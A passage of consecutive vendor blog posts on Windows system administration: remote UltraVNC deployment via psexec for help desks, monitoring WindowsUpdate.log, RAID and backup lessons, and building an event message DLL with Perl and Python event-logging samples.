The thought of having a resource-hogging agent running on a server sends shivers down the backs of many SysAdmins, and the agents used by certain AntiVirus vendors that rhyme with Taffy didn’t set a good precedent.
Stability & Reliability
The agent needs to run at all times without crashing – the SysAdmin needs to be able to go to sleep knowing that his agents will reliably monitor all servers and workstations. Unstable agents are just no fun, especially when they negatively impact the host OS.
If an agent encounters an issue, it needs to at least auto-recover and communicate the issue to the admin.
Deployment
Agent deployment and management needs to be streamlined and easy – it shouldn’t be a burden on the end user. And while agent deployment is important, agent management, keeping the remote agent up-to-date, is equally important and should – ideally – be handled automatically.
Most SysAdmins have enough work the way it is, the last thing they need is baby-sitting agents of their monitoring solution.
Dependencies
The more dependencies an agent has, the more difficult it is to deploy the agent. Agents that rely on complex frameworks like .NET, Java or specific Visual Studio runtimes are difficult and time-consuming to deploy.
Furthermore, any third-party software that is installed as a dependency creates an additional attack vector and needs to then be kept up-to-date.
Security
An agent needs to be 100% secure and cannot expose the monitored host to any additional security risks. As explained above, using agents is actually more secure than not using an agent – even though this seems counter-intuitive at first glance.

Remote Support with VNC – The Easy & Secure Way!

Almost everyone in IT has heard of VNC – which actually stands for "Virtual Network Computing". The RFB (Remote Framebuffer) protocol which VNC relies on was developed around 1998 by the Olivetti & Oracle Research Lab. Olivetti (unlike Oracle) isn't well known outside of Italy/Europe, and the ORL was ultimately closed in 2002 after being acquired by AT&T. But enough of the history.

When the need arises to remotely log into a (Windows) host on the network, Microsoft’s Remote Desktop application (which utilizes Microsoft’s RDP protocol – not RFB) is usually the default choice. And why wouldn’t it be? It’s built into Windows, there is no additional cost, and it’s usually quite efficient (=fast) – even over slower connections.

Remote Desktop has a few disadvantages though, especially when it comes to the IT help desk:

  • You cannot view the remote user’s current desktop
  • It’s not cross-platform
  • You can’t use RDP if it’s disabled or misconfigured

Especially when troubleshooting user problems, being able to see exactly what the user is doing is obviously very beneficial. VNC-based applications are a good alternative since they allow you to view the user’s desktop and subsequently interact with the user. This makes VNC viable for help desk as well as troubleshooting. Nevertheless, VNC-based solutions have their own shortcomings:

  • Free variations of VNC usually offer no deployment assistance
  • With over 10 variants available, finding the best VNC implementation is a daunting task
  • VNC is still deemed as somewhat insecure
  • VNC can be slow

We set out to solve these shortcomings by creating a number of scripts around UltraVNC that integrate with the EventSentry management console (although they'll also work without EventSentry!). Using the QuickTools feature, you can then connect to a remote host via VNC with 2 clicks, even if the remote host doesn't have VNC installed.

Important: The scripts only work in environments where you have administrative access to the remote hosts. The scripts need to copy files to the remote host’s administrative shares and control the remote VNC service.

Alternatively, you will also be able to start a VNC session by running the following command:

vnc_start.bat remotehost.yourdomain.com

Even better, VNC can be automatically stopped and deactivated (until vnc_start.bat is run again) once the session is completed in order to reduce the attack surface.

VNC Deployment
As long as you have administrative access to the remote host(s), the script will remotely install VNC and even set up a firewall exclusion rule if necessary – although the UltraVNC installer takes care of this out of the box.

Security
To reduce the attack surface of machines running VNC you can automatically stop the VNC service after you have disconnected from the remote host. Our connection script will automatically start the remote service again when you connect the next time.

For the utmost security you can also completely uninstall VNC when you are done, a script (vnc_uninstall.bat) is included for this purpose.

Speed
Even though VNC is generally not as fast as RDP, it’s usually sufficiently fast in LAN environments (especially for shorter trouble-shooting sessions) and the UltraVNC port which we’ll be covering in this post performs reasonably well even over slower WAN connections.

Integration with EventSentry
Monitoring workstations with EventSentry strengthens the capabilities of any IT helpdesk and IT support team with:

  • Software & Hardware Inventory
  • Access to process utilization and log consolidation
  • Enhanced security with security log & service monitoring
  • User console logon tracking
  • Pro-active troubleshooting with access to performance and other system health metrics

Remote desktop sharing is an additional benefit with the UltraVNC package which is included with the latest version of EventSentry (v3.3.1.42). Customizing the scripts and integrating them with EventSentry shouldn't take more than 5 minutes, and once set up & configured it will allow you to remotely control any monitored host with a couple of clicks. The scripts do not require EventSentry, but are included with the setup and integrate seamlessly into the EventSentry Management Console.

The EventSentry Management Console includes the “QuickTools” feature which allows you to link up to 8 commands to the context menu of a computer item. EventSentry ships with a few default QuickTools commands, for example to reboot a remote machine. Once configured, you simply right-click a computer icon in the EventSentry Management console and select one of the pre-configured applications from the QuickTools sub menu.

EventSentry QuickTools
EventSentry QuickTools

How does it work?
When you run the vnc_start.bat script, it will first check to see if UltraVNC is already installed on the remote host. If it is, it will skip the installation routine and bring up the local VNC viewer. If you configured the script to automatically stop the VNC service when not in use, it will start the service beforehand. When you disconnect, it will (optionally) stop the VNC service again so that VNC is not accessible remotely anymore.

If VNC is not installed, the script will remotely install & configure UltraVNC using psexec.

If you do not want to leave the UltraVNC service installed on the remote computer, the vnc_uninstall.bat script can be run when the remote session is done. Automatically stopping the remote VNC service is however sufficient in most cases.

Prerequisites
There is not much you need:

  • psexec.exe from Microsoft's PsTools suite
  • The 32-bit and/or 64-bit UltraVNC installers
  • Administrative access to the remote host(s)

Installation
The scripts need to be configured before they can be used in your environment, unless you are an EventSentry user, in which case you only need to download & install the prerequisites.

Super Quick Setup for EventSentry Users
It’s no secret, we’re a little biased towards our EventSentry users, and as such setting this up with an existing EventSentry installation is rather easy:

  1. Get psexec.exe and save it in C:\Program Files (x86)\EventSentry\resources.
  2. Download the UltraVNC installers (they have 32-bit and 64-bit – download for the platforms you have on your network) and store them in the C:\Program Files (x86)\EventSentry\scripts\ultravnc folder.
  3. Install UltraVNC on the computer where EventSentry is installed so that the VNC Viewer is available. It’s not necessary to install the whole package, only the viewer component is required.
  4. If “VNC” is not listed in your QuickTools menu, then you will need to add it under Tools->Options->QuickTools. Simply enter “VNC” as the description and specify the path to the vnc_start utility, e.g. “C:\Program Files (x86)\EventSentry\scripts\ultravnc\vnc_start.bat $COMPUTER”. You can optionally check the “Hide” box to prevent the script output from being shown before you connect.

You’ll notice that no password was configured – that’s because you will be logging in with a Windows user and password – only allowing domain admins access by default. This can be configured in the authorized_acl.inf file, if you want to give additional groups and/or users access that are not domain admins.

That’s literally it – easy as pie. Even though we designed this thing to be easy peasy, since things do occasionally go wrong I recommend testing a first connection from the command line. Just open an administrative command prompt, navigate to C:\Program Files (x86)\EventSentry\scripts\ultravnc and type vnc_start somehost.

Now just right-click any host – or use the “Quicktools” button in the ribbon – and select the “VNC” menu option. Keep in mind that first-time connections will take longer since the VNC setup file has to be copied and installed on the remote computer. Subsequent connections should be faster.

VNC Viewer Connect Dialog
VNC Viewer Connect Dialog

Manual Normal-Speed Setup for Non-EventSentry Users
So you are not an EventSentry user but still want to utilize these awesome scripts? No problem – we won’t hold it against you. The setup is still easy – you’ll just need to customize a few variables in the variables.bat file.

  1. Download the package from here.
  2. Create a local folder for this project, e.g. C:\Deployment\UltraVNC.
  3. Copy all the scripts to this folder, e.g. you should end up with C:\Deployment\UltraVNC\vnc_start.bat
  4. Open the file variables.bat in a text editor and keep it open as you will be making a few modifications to this file.
  5. In variables.bat, set the VNCSOURCE variable to the directory you just created.
  6. Download the latest version of both the 32-bit and 64-bit UltraVNC installers.
  7. In variables.bat, set the VNCSETUP_X86 and VNCSETUP_X64 to the setup file names you just downloaded.
  8. Download the PSTools and extract psexec.exe into the working directory, or a directory of your choice.
  9. In variables.bat, point the PSEXECFILE variable to the location where you just saved psexec.exe.
  10. Optional: Edit the authorized_acl.inf file to specify which Windows group or user will have access to VNC. You can either change the first line, or add additional lines to give additional users and/or groups permission.
  11. Install the respective version of UltraVNC on your workstation so that the VNC Viewer is available.
  12. Open a command line window and navigate to the folder to which VNCSOURCE points to. Test the setup by running vnc_start hostname, replacing “hostname” with an actual host name of a remote host of course.
  13. When presented with the login screen of the VncViewer, log in with a Windows domain admin user.

That wasn’t so bad now, was it? Just remember that you’ll need to initiate any VNC session with the vnc_start.bat file. Just launching the Viewer won’t work – even if VNC is already installed on the remote machine – since the VNC service is stopped by our scripts by default. To use the folder names we created, you’ll just run

C:\Deployment\UltraVNC\vnc_start hostname

Enjoy, and happy RFBing!

Connecting to remote host
Connecting to remote host

Configuration – variables.bat
For the sake of completeness the variables.bat file is explained below:

VNCSETUP_X86: The file name of the 32-bit installer. This needs to only be changed whenever UltraVNC comes out with a new version.
VNCSETUP_X64: The file name of the 64-bit installer. This needs to only be changed whenever UltraVNC comes out with a new version.

REMOTEINSTALLPATH: The directory where the script files will be copied to on the remote host.

VNCSOURCE: This is the folder where all the vnc-related files, including the setup executables, are located on the source host from where you initiate VNC connections – e.g. C:\Deployment\UltraVNC.
VNCINSTALLDIR: The directory in which UltraVNC will be installed in (on the remote hosts).

VNCPASSWORD: This variable is not currently used since UltraVNC is automatically configured to authenticate against Windows, by default giving only Domain Admins access to VNC. This is generally more secure than using a password. You can edit the file authorized_acl.inf to give additional users and/or groups access to VNC. The file supports one ACL entry per line.

PSEXECFILE: Unfortunately we are not allowed to bundle the nifty psexec.exe file for license reasons, so you’ll have to download the PsTools and point this variable to wherever you end up copying the psexec.exe file to. If you already have psexec.exe installed then you can save yourself 2 minutes of time and just specify the path to the existing file here.

SET_VNC_SVC_TO_MANUAL: If you don't entirely trust the security of VNC, maybe because you know what a brute force attack is, and you only want administrators to access VNC, then you can set this variable to 1. As long as you only connect to the remote host(s) using the vnc_start.bat script, the scripts will ensure that the remote VNC service is started before you connect and stopped after you disconnect. Between the two of us, I'd always leave this set to 1 unless you have the desire to launch the VNC Viewer directly, or need non-administrators to be able to connect to the remote host(s).

ADD_FIREWALL_RULE: As the name (almost) implies, this will create a firewall exclusion rule on the remote host(s) if you’ve been doing your homework and enabled the Windows firewall. If you don’t like our boring firewall rule name then you can even change the name below by editing the FW_RULE_NAME variable. Enabling this is usually not necessary since the UltraVNC setup adds firewall exclusion rules by default.

VNCVIEWER: If you find that a different version of the VNC viewer works better than the version which we are shipping, then you can change the file name here.

 

Monitoring Windows Updates

Automatic Windows Updates are a wonderful thing when they are working as expected, and many organizations employ WSUS or patch management software to keep their infrastructure up to date with the latest Microsoft hot fixes and service packs.

While this works for many, not everybody can afford patch management software, and, while free, managing the disk-hungry WSUS can be a daunting task as well. This leaves some sysadmins to use the old-fashioned Windows Updates to install all the regular and out-of-band patches Microsoft releases.

If you don’t feel comfortable installing patches automatically however, configuring Windows Update to “download updates for later manual installation” is often safer and more predictable. But, if you’re not logging on to the server(s), you won’t know whether one or more updates are ready for installation or not. Even if you’re just managing one server, checking in on a regular basis can be a waste of time.

updates_are_ready.png

This is where EventSentry and its log file monitoring feature come in. It turns out that Windows, like a diligent ship captain, logs all activity to a log file. And with all, I really do mean ALL. The file I'm talking about is windowsupdate.log, and it tells you just about everything that's going on with Windows Update. In 3-4 steps that don't take longer than 5 minutes, you can set up real-time monitoring of the WindowsUpdate.log file, and be notified when updates are about to be downloaded to a monitored computer.

The screenshot below shows what such an email from EventSentry would look like:

email_approved_updates.png

From then on, you can either get email notifications when patches are downloaded, or use the web-based reporting to view a report from all of your monitored hosts. On a high level, the configuration works like this:

  1. Setup a log file (%systemroot%\windowsupdate.log in this case)
  2. Create & assign a new log file package
  3. Define a log file filter (this tells EventSentry what to look for in the file, and where to send it)
  4. Setup an email action (this is usually already setup)
  5. Optionally setup an event log filter to forward alerts to email (the default filter setup should automatically forward warnings)

The WindowsUpdate.log is useful for troubleshooting as well, and you can consolidate the content of this file from all of your servers in the central EventSentry database. This makes searching for text and/or comparing the log from multiple servers a breeze. Having the log file accessible through the web reports is also useful when a patch caused problems and the server is offline. You can view the most recent activity from the log file through the web-based reporting even when the server is unavailable.
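Even without EventSentry – or when you just need a quick look – you can follow the file by hand from a PowerShell prompt; a minimal sketch for systems with PowerShell 3 or later:

# Sketch: follow WindowsUpdate.log in real time and surface "Approved Updates" lines
Get-Content "$env:SystemRoot\WindowsUpdate.log" -Tail 50 -Wait |
    Select-String 'Approved Updates ='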

So how do you set this up? Assuming you have EventSentry v2.93 installed (any edition will do, including the free “light” version), you can follow the steps outlined below. Note that all steps will need to be performed in the EventSentry management console.


1. Setup a file definition.
This tells EventSentry which file you want to monitor, and sets up a logical representation of that file in the EventSentry configuration. In the “Tools” menu, click “Log Files and File Types” and then click the “Add” button.

[Screenshots: menu_tools.png, add_file_definition.png, tree_logfile_package.png]

2. Create a package and add a filter.
Right-click the “Log File Packages” container, select “Add Package” and choose a descriptive name. Since new packages are unassigned by default, right-click the newly created package, select “Assign” and assign the package to the host(s) on which you want to monitor the WindowsUpdate.log file.

3. Set up a log file filter.
This tells EventSentry which content of the monitored file you are interested in. In every log file filter you can configure a database as well as an event log filter.

Right-click the previously created package and select “Add File”. From the list, select the log file definition created in step 1, “WindowsUpdateLog”, and then select the newly added log file entry.

The database tab determines which content goes to the database (in most cases you will write all file contents to the database), while the event log tab determines which log file contents are written to the event log. For this project, we are interested in the following wildcard matches:

*AU*# Approved Updates =*

*DnldMgr*Updates to download =*

The first wildcard match will tell you the total number of updates which have been approved and will be downloaded, whereas the 2nd line will fire for every individual update which will be downloaded. In most cases the first line is sufficient and the 2nd line can be skipped.
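If you want to get a feel for how these wildcard patterns behave before deploying them, you can emulate the * matching with a few lines of Python. Note that the sample log line below is hypothetical and only illustrates the shape of a matching entry – it is not copied from an actual windowsupdate.log:

from fnmatch import fnmatch

patterns = ["*AU*# Approved Updates =*", "*DnldMgr*Updates to download =*"]

# Hypothetical windowsupdate.log line, for illustration only
sample = "2014-06-10 09:15:03:111 912 ab4 AU # Approved Updates = 3"

for pattern in patterns:
    print(pattern, "->", fnmatch(sample, pattern))

# *AU*# Approved Updates =* -> True
# *DnldMgr*Updates to download =* -> False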

[Screenshot: file_filter_eventlog.png]

That’s it! With this setup, you will immediately get notified when patches are ready to be installed. The only thing I didn’t cover here is how to set up an email action and a corresponding event log filter, since both of these are usually already set up by default. If you need help with this, please check out our documentation and/or tutorials.

Please note that the full and evaluation version of EventSentry can inventory installed software and patches. This enables you to use the web interface for viewing/searching installed patches, and get (email) alerts when a patch has been successfully installed.

As always, happy monitoring!

Do not trust thee RAID alone

I’m assuming that most readers are familiar with what RAID, the “Redundant Array of Inexpensive Disks”, is. Using RAID for disk redundancy has been around for a long time; it was apparently first mentioned in 1987 at the University of California, Berkeley (see also: The Story So Far: The History of RAID). I’m honestly not sure why they chose the term “inexpensive” back in 1987 (I suppose “RAD” isn’t as catchy a name), but regardless of the wording, a RAID is a fairly easy way to protect yourself against hard drive failure. Presumably, any production server will have a RAID these days, especially with hard drives being as inexpensive as they are today (unless you purchase them at list price from major hardware vendors, that is). Another reason why RAID is popular is of course the fact that hard drives are probably the most common component to break in a computer. You can’t really blame them either – they do have to spin an awful lot.

[Photo: burnt_server.jpg]

Lesson #1: Don’t neglect your backups because you are using RAID arrays
That being said, we recently had an unpleasant and unexpected issue in our office with a self-built server. While it is a production server, it is not a very critical one, and as such a downtime of 1-2 days with a machine like that is acceptable (albeit not necessarily desired). Unlike the majority of our “brand-name” servers, which are under active support contracts, this machine was using standard PC components (it’s one of our older machines), including an onboard RAID that we utilized for both the OS drive as well as the data drive (it has four disks, configured as two RAID 1 mirrors). Naturally, the machine is monitored through EventSentry.

Well, one gray night it happened – one of the hard drives failed, and a bunch of events (see myeventlog.com for an example) were logged to the event log and immediately emailed to us. After reviewing the emails with some disappointment, the anticipated procedure was straightforward:

1) Obtain replacement hard drive
2) Shut down server
3) Replace failed hard drive
4) Boot server
5) Watch RAID rebuilding while sipping caffeinated beverage

The first 2 steps went smoothly, but that’s unfortunately as far as our IT team got. The first challenge was to identify the failed hard drive. Since the drives weren’t in a hot-swappable enclosure, and the events didn’t indicate which drive had failed, we chose to go the safe route and test each one of them with the vendor’s hard drive test utility. I say safe, because a failed hard drive might work again for a short period of time after a reboot, so without testing the drives you could potentially hook the wrong drive back up. It’s usually a good idea to spend a little bit of extra time in that case to determine which one is the culprit.

Eventually, the failed hard drive was identified, replaced with a new (identical) drive, connected, and booted again. Normally, when connecting an empty hard drive, the RAID controller initiates a rebuild, and all is well. In this case however, the built-in NVidia RAID controller would not recognize the RAID array anymore. Instead, it congratulated us on having installed two new disks. Ugh. Apparently, the RAID was no more – it was gone – pretty much any IT guy’s nightmare.

No matter what we tried – different drive combinations, re-creating the original setup with the failed disks, trying the mirrored drive by itself – the RAID was simply a goner. I can’t retell all the things that were tried, but we ultimately had to re-create the RAID (resulting in an empty drive) and restore from backup.

We never did find out why the RAID 1 mirror that was originally setup was not recognized anymore, and we suspect that a bug in the controller firmware caused the RAID configuration to be lost. But regardless of what was ultimately the cause, it shows that even entire RAID arrays may fail. Don’t relax your backup policy just because you have a RAID configured on a server.

Lesson #2: Use highly reliable RAID levels, or configure a hot spare
Now I’ll admit, the majority of you are running your production servers on brand-name machines, probably with a RAID 1 or RAID 5, presumably under maintenance contracts that ship replacement drives within 24 hours or less. And while that does sound good and gives you comfort, it might actually not be enough for critical machines.

Once a drive in a RAID5 or RAID1 fails, the RAID array is in a degraded state and you’re starting to walk on very thin ice. At this point, of course, any further disk failure will require a restore from backup. And that’s usually not something you want.

So how could a RAID 5 not be sufficiently safe? Please, please: Let me explain.

Remember that the RAID array won’t be fully fault tolerant until the RAID array is rebuilt – which might be many hours AFTER you plug in the repaired disk depending on the size, speed and so forth. And it is during the rebuild period that the functional disks will have to work harder than usual, since the parity or mirror will have to be re-created from scratch, based on the existing data.

Is a subsequent disk failure really likely though? It’s already pretty unlikely that a disk fails in the first place – disks don’t usually fail every other week. It is, however, much more likely than you’d think, depending somewhat on whether the disks are related to each other. What I mean by related is whether they come from the same batch. If there was a problem in the production process – resulting in a faulty batch – then it’s actually quite likely that another one bites the dust sooner rather than later. It has happened to a lot of people – trust me.

But even if the disks are not related, they are probably of the same age with similar wear and, as such, likely to fail in a similar time frame. And, as mentioned before, the RAID array rebuild process will put a lot of strain on the remaining disks. If any disk is already on its last leg, then a failure will be that much more likely during the rebuild.
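To put a rough number on this, here is a back-of-the-envelope sketch in Python. The failure rate and rebuild window are assumptions chosen for illustration, and the model treats drives as independent – which, as just discussed, real drives from the same batch are not – so treat the result as an optimistic lower bound:

import math

# Assumed numbers, for illustration only
afr = 0.05              # annual failure rate per drive (5%)
rebuild_hours = 24      # time until the array is fully redundant again
surviving_drives = 3    # e.g. a 4-disk RAID 5 after one failure

# Constant failure rate (exponential) model:
# P(at least one more drive fails during the rebuild window)
rate_per_hour = afr / (365 * 24)
p_second_failure = 1 - math.exp(-rate_per_hour * rebuild_hours * surviving_drives)

print(f"{p_second_failure:.4%}")   # roughly 0.04% with these numbers

That sounds tiny per rebuild, but correlated failures (same batch, same age, rebuild stress) can push the real-world number considerably higher – which is exactly why hot spares and double-parity levels exist.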

RAID 6, if supported by your controller, is usually preferable to RAID 5, as it includes two parity blocks, allowing up to two drives to fail. RAID 10 is also a better option with potentially better performance, as it too continues to operate when two disks fail (as long as the two failed disks aren’t part of the same mirrored pair). You can also add a hot spare disk, a stand-by disk that automatically replaces a failed disk.

If you’re not 100% familiar with the difference between RAID 0, 1, 5, 6, 10 etc. then you should check out this Wikipedia article: It outlines all RAID levels pretty well.

Of course, a RAID level that provides higher availability is usually less efficient with regard to storage. As such, a common counterargument against using a more reliable RAID level is the additional cost associated with it. But when designing your next RAID, ask yourself whether the savings of an additional hard drive are worth the additional risk, and the potential of having to restore from a backup. I’m pretty sure that in most cases, they’re not.

Lesson #3: Ensure you receive notifications when a RAID array is degraded
Being in the monitoring business, I need to bring up another extremely important point: Do you know when a drive has failed? It doesn’t help much to have a RAID when you don’t know when one or more drives have failed.

Most server management software can notify you via email, SNMP and such – assuming it’s configured. Since critical events like this almost always trigger event log alerts as well, a monitoring solution like EventSentry can simplify the notification process. Since EventSentry monitors event logs, syslog as well as SNMP traps, you can take a uniform approach to notifications. EventSentry can notify you of RAID failures regardless of the hardware vendor you use – you just need to make sure the controller logs the error to the event log.

Lesson #4+5: Test Backups, and store backups off-site
Of course one can’t discuss reliability and backups without preaching the usual. Test your backups, and store (at least the most critical ones) off-site.

Yes, testing backups is a pain, and quite often it’s difficult as well and requires a substantial time commitment. Is testing backups overkill, something only pessimistic paranoids do? I’m not sure. But we learned our lesson the hard way when all of our 2008 backups were essentially incomplete, due to a missing command-line switch that was supposed to record the system state (and in our case did not). We discovered this after, well, we could NOT restore a server from a backup. Trust me: Having to restore a failed server with only an incomplete, out-of-date or broken backup is not a situation you want to find yourself in.

My last recommendation is off-site storage. Yes, you have a sprinkler system, building security and feel comfortably safe. But look at the picture on top. Are you prepared for that? If not, then you should probably look into off-site backups.

So, let me recap:

1. Don’t neglect your backups because you are using RAID arrays.
2. Use highly reliable RAID levels, or configure a hot spare.
3. Ensure you receive notifications when a RAID array is degraded.
4. Test your backups regularly, but at the very least test them once to ensure they work.
5. Store your backups, or at least the most critical ones, off-site.

Stay redundant,
Ingmar.


Creating your very own event message DLL

If you’ve ever written code that logs to the Windows event log (e.g. through Perl, Python, …), then you might have run into a problem similar to one I described in an earlier post: either the events don’t display correctly in the event log, you are restricted to a small range of event ids (as is the case with eventcreate.exe), or you cannot utilize insertion strings.

In this blog post I’ll be showing you how to build a custom event message DLL, from beginning to end. We’ll start with creating the DLL using Visual Studio (Express) and finish up with some example scripts, including Perl of course, that utilize the DLL and log elegantly to the event log.

Let’s say you are running custom scripts on a regular basis in your network – maybe with Perl, Python, Ruby etc. Your tasks, binary as they are, usually do one of two things: They run successfully, or they fail. To make troubleshooting easier, you want to log any results to the event log – in a clean manner. Maybe you even have sysadmins in other countries and want to give them the ability to translate standard error messages. Logging to the event log has a number of benefits: It gives you a centralized record of your tasks, allows for translation, and gives you the ability to respond to errors immediately (well, I’m of course assuming you are using an event log monitoring solution such as EventSentry). Sounds interesting? Read on!

Yes, you can do all this, and impress your peers, by creating your own event message file. And what’s even better, is that you can do so using all free tools. Once you have your very own event message file, you can utilize it from any application that logs to the event log, be it a perl/python/… script or a C/C++/C#/… application.

To create an event message file, you need two applications:

• Visual Studio Express
• The Microsoft Platform SDK

The reason you need the Platform SDK is that Visual Studio Express, for some reason, does not ship with the message compiler, mc.exe. The message compiler is essential – without it there will be no event message file. When installing the Platform SDK, you can deselect all options except for “Developer Tools -> Windows Development Tools -> Win32 Development Tools” if you want to conserve space. This is the only component of the SDK that’s needed.

An event message file is essentially a specific type of resource that can be embedded in either a DLL file or executable. In EventSentry, we originally embedded the message file resources in a separate DLL, but eventually moved it into the executable, mostly for cleaner and easier deployment. We’ll probably go back to a separate message DLL again in the future, mostly because processes (e.g. the Windows Event Viewer) can lock the event message file (the executable in our case), making it difficult to update the file.

Since embedding an event message file in a DLL is more flexible and significantly easier to accomplish, I’ll be covering this scenario here. The DLL won’t actually contain any executable code, it will simply serve as a container for the event definitions that will be stored inside the .dll file. While it may sound a little bit involved to build a DLL just for the purpose of having an event message file (especially to non-developers), you will see that it is actually surprisingly easy. There is absolutely no C/C++ coding required, and I also made a sample project available for download, which has everything setup and ready to go.

In a nutshell, the basic steps of creating an event message file are as follows:

1. Create a message file (e.g. messagefile.mc)
2. Convert the message file into a DLL, using mc.exe, rc.exe and link.exe

Once we have the message file, we will also need to register the event message file in the registry, and associate it with an event source. Keep in mind that the event source is not hard-coded into the message file itself, and in theory a single event message file could be associated with multiple event sources (as is the case with many event sources from Windows).

So let’s start by creating a working folder for the project, and I will call it “myapp_msgfile”. Inside that directory we’ll create the message file, let’s call it myapp_msgfile.mc. This file is a simple text file, and you can edit it with your favorite text editor (such as Ultraedit, Notepad2 or Notepad++).

The file with the .mc extension is the main message file that we’ll be editing – here we define our event ids, categories and so forth. Below is an example, based on the scenario from before. Explanations are shown inline.


MessageIdTypedef=WORD

LanguageNames=(
English=0x409:MSG00409
German=0x407:MSG00407
)

Here we define which languages we support, and the files that will back each language. You will have to look up the language ids for additional languages if you plan on supporting more, and you can remove German if you only plan on supporting English.


MessageId=1
SymbolicName=MYTOOL_CATEGORY_GENERAL
Language=English
Tasks
.
Language=German
Jobs
.

Our first event id, #1, will be used for categories. Categories work in the exact same way as event ids. When we log an event to the event log and want to include a category, then we only log the number – 1 in this case.


MessageId=100
SymbolicName=TASK_OK
Language=English
Task %1 (%2) completed successfully.
.
Language=German
Job %1 (%2) war erfolgreich.
.

This is the first event description. The “MessageId” field specifies the event id, and the symbolic name is a descriptive and unique name for the event. The language specifies one of the supported languages, followed by the event message text. You end the event description with a single period – that period has to be the only character on its line.


MessageId=101
SymbolicName=TASK_ERROR
Language=English
Task %1 (%2) failed to complete due to error "%3".
.
Language=German
Job %1 (%2) konnte wegen Fehler "%3" nicht abgeschlossen werden.
.

MessageId=102
SymbolicName=TASK_INFO
Language=English
Task Information: %1
.
Language=German
Job Information: %1
.

Since we’re trying to create events for a custom task engine, we need both success and failure events here. And voila, our event message file now has events 100 – 102, plus an id for a category.

So now that we have our events defined, we need to convert that into a DLL. The first step now is to use the message compiler, mc.exe, to create a .rc file as well as the .bin files. The message compiler will create a .bin file for every language that is defined in the mc file. Open the “Visual Studio Command Prompt (2010)” in order for the following commands to work:


mc.exe myapp_msgfile.mc

will create (for the .mc file depicted above):


myapp_msgfile.rc
msg00407.bin
msg00409.bin

With those files created, we can now create a .res (resource) file with the resource compiler rc.exe:


rc.exe /r myapp_msgfile.rc

which will create the


myapp_msgfile.res

file. The “/r” option instructs the resource compiler to emit a .res file. Now we’re almost done – we’re going to let the linker do the rest of the work for us:


link -dll -noentry -out:myapp_msgfile.dll myapp_msgfile.res

The myapp_msgfile.res is the only input file to the linker; normally one would supply object (.obj) files to the linker to create a binary file. The "-noentry" option tells the linker that the DLL does not have an entry point, meaning that we do not need to supply a DllMain() function – thus the linker is satisfied even without any object files. This is of course desired, since we’re not looking to create a DLL that has any code or logic in it.

After running link.exe, we’ll end up with the long awaited myapp_msgfile.dll file.

The end. Well, almost. Our message file is at this point just a lone accumulation of zeros and ones, so we need to tell Windows that this is actually a message file for a particular event log and source. That’s done through the registry, as follows:

Open the registry editor regedit.exe. Be extremely careful here, the registry editor is a powerful tool, and needs to be used responsibly :-).

All event message files are registered under the following key:


HKLM\System\CurrentControlSet\Services\eventlog

Under this key, you will find a key for every event log as well as subkeys for every registered event source. So in essence, the path to an event source looks like this:


HKLM\System\CurrentControlSet\Services\eventlog\EVENTLOG\EVENTSOURCE

I’m going to assume here that we are going to be logging to the application event log, so we’d need to create the following key:


HKLM\System\CurrentControlSet\Services\eventlog\Application\MyApp

In this key, we need the following values:


TypesSupported (REG_DWORD)
EventMessageFile (REG_EXPAND_SZ)

TypesSupported is usually 7, indicating that the application will log either Information, Warning or Error events (you get 7 if you OR 1[error], 2[warning] and 4[information] together).

EventMessageFile is the path to your message DLL. Since the type is REG_EXPAND_SZ, the path may contain environment variables.

If you plan on utilizing categories as well, which I highly recommend (and for which our message file is already setup), then you need two additional values:


CategoryCount (REG_DWORD)
CategoryMessageFile (REG_EXPAND_SZ)

CategoryCount simply contains the total number of categories in your message file (1, in our case), and the CategoryMessageFile points to our message DLL. Make sure that your message file does not contain any sequence gaps, so if your CategoryCount is set to 10, then you need to have an entry for every id from 1 to 10 in the message file.

We could create separate message files for messages and categories, but that would be overkill for a small project like this.
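If you prefer scripting the registration over clicking through regedit, the following Python sketch creates the same values using the standard winreg module. The DLL path is an assumption based on our working folder – adjust it to wherever your myapp_msgfile.dll actually lives – and run the script elevated, since it writes to HKLM:

import winreg

key_path = r"SYSTEM\CurrentControlSet\Services\eventlog\Application\MyApp"
dll_path = r"C:\myapp_msgfile\myapp_msgfile.dll"   # assumed location of the message DLL

with winreg.CreateKeyEx(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
    winreg.SetValueEx(key, "TypesSupported", 0, winreg.REG_DWORD, 7)
    winreg.SetValueEx(key, "EventMessageFile", 0, winreg.REG_EXPAND_SZ, dll_path)
    # Only needed if you use categories (our message file defines one)
    winreg.SetValueEx(key, "CategoryCount", 0, winreg.REG_DWORD, 1)
    winreg.SetValueEx(key, "CategoryMessageFile", 0, winreg.REG_EXPAND_SZ, dll_path)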

Now that we have that fancy message DLL ready to go, we need to start logging. Below are some examples of how you can log to the event log with a scripting language. I’ll be covering Perl, Python, and KiXtart. Me being an old Perl fan and veteran, I’ll cover that first.

PERL
The nice thing about Perl is that you can take full advantage of insertion strings, so it can support event definitions containing more than one insertion string.


use strict;
use Win32::EventLog;


# Call this function to log an event

sub logMessage
{
    my ($eventID, $eventType, @eventDetails) = @_;

    # The source name must match the event source registered in the registry ("MyApp")
    my $evtHandle = Win32::EventLog->new("MyApp");

    my %eventProperties;

    # Category is optional, specify only if message file contains entries for categories
    $eventProperties{Category}  = 0;
    $eventProperties{EventID}   = $eventID;
    $eventProperties{EventType} = $eventType;
    $eventProperties{Strings}   = join("\0", @eventDetails);

    $evtHandle->Report(\%eventProperties);

    $evtHandle->Close;
}


# This is what you would use in your scripts to log to the event log. The insertion strings
# are passed as an array, so even if you only have one string, you would need to pass it
# within parentheses ("This is my message") as the last parameter. Event 100 uses two
# insertion strings (%1 and %2), event 102 uses one (%1).

logMessage(100, EVENTLOG_INFORMATION_TYPE, ("Database Backup", "Monitoring Database"));
logMessage(102, EVENTLOG_INFORMATION_TYPE, ("Step 1/3 Complete"));


PYTHON

Python supports event logging very well too, including multiple insertion strings. See the sample code below:


import win32evtlogutil
import win32evtlog


# Here we define our event source and category, which we consider static throughout
# the application. "MyApp" is the event source registered in the registry, and
# category 1 is the id we set aside in the message file.

eventDetails = {'Source': 'MyApp',
                'Category': 1}


# Call this function to log an event

def logMessage(eventID, eventType, message, eventDetails):
    if type(message) == type(str()):
        message = (message,)
    win32evtlogutil.ReportEvent(eventDetails['Source'], eventID, eventDetails['Category'],
                                eventType, tuple(message))

logMessage(100, win32evtlog.EVENTLOG_INFORMATION_TYPE, ("Database Backup", "Monitoring Database"), eventDetails)
logMessage(102, win32evtlog.EVENTLOG_INFORMATION_TYPE, "Step 1/3 complete", eventDetails)

KIXTART
The pro: Logging to the event log using KiXtart is so easy it’s almost scary. The con: It only supports message files that use one insertion string.


